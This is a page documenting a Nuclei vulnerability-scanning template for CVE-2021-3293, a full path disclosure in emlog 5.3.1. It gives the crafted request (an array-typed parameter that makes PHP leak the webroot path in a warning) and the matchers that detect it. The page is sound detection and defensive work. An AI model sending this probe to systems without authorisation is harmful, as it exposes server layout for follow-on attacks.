emlog 5.3.1 Path Disclosure
ID: CVE-2021-3293
Severity: medium
Author: h1ei1
Tags: cve2021,cve,emlog,fpd
Description
Section titled “Description”emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file.
YAML Source
Section titled “YAML Source”id: CVE-2021-3293
info: name: emlog 5.3.1 Path Disclosure author: h1ei1 severity: medium description: emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file. impact: | An attacker can gain knowledge of the server's file system structure, potentially leading to further attacks. remediation: | Apply the latest patch or upgrade to a version that fixes the vulnerability. reference: - https://github.com/emlog/emlog/issues/62 - https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md - https://nvd.nist.gov/vuln/detail/CVE-2021-3293 - https://github.com/Z0fhack/Goby_POC - https://github.com/20142995/Goby classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-3293 cwe-id: CWE-22 epss-score: 0.003 epss-percentile: 0.69462 cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: emlog product: emlog tags: cve2021,cve,emlog,fpd
http: - raw: - | GET /t/index.php?action[]=aaaa HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word words: - "<b>Warning</b>" - "on line" - "expects parameter" condition: and
- type: status status: - 200# digest: 4b0a00483046022100ac0b972765b8c1855a1f089a5f3ccad197d7b9c002c3995efb9b0c0566aad91f0221009802711ca93607ddb9e932c1521f527400ef1818d00f1133d29a0c6a78f010a6:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-3293.yaml"